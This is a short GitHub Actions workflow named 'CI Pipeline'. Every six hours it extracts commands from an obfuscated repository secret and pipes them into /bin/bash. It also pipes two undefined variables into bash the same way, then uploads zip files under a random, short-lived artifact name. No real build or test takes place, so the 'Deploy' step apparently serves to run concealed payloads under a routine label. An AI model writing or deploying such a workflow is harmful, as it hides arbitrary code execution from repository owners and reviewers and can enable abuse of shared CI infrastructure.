name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '16 2,8,14,20 * * *'
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          hp7854: ${{ secrets.hp7854 }}
        run: |
          printf '%s' "$hp7854" | jq -r .h799 | /bin/bash
          echo $th24 | jq -r .dn6346 | /bin/bash
          echo $qcq10647 | jq -r .pvuo8202 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: DgR8QJmy
          path: "*.zip"
          retention-days: 1
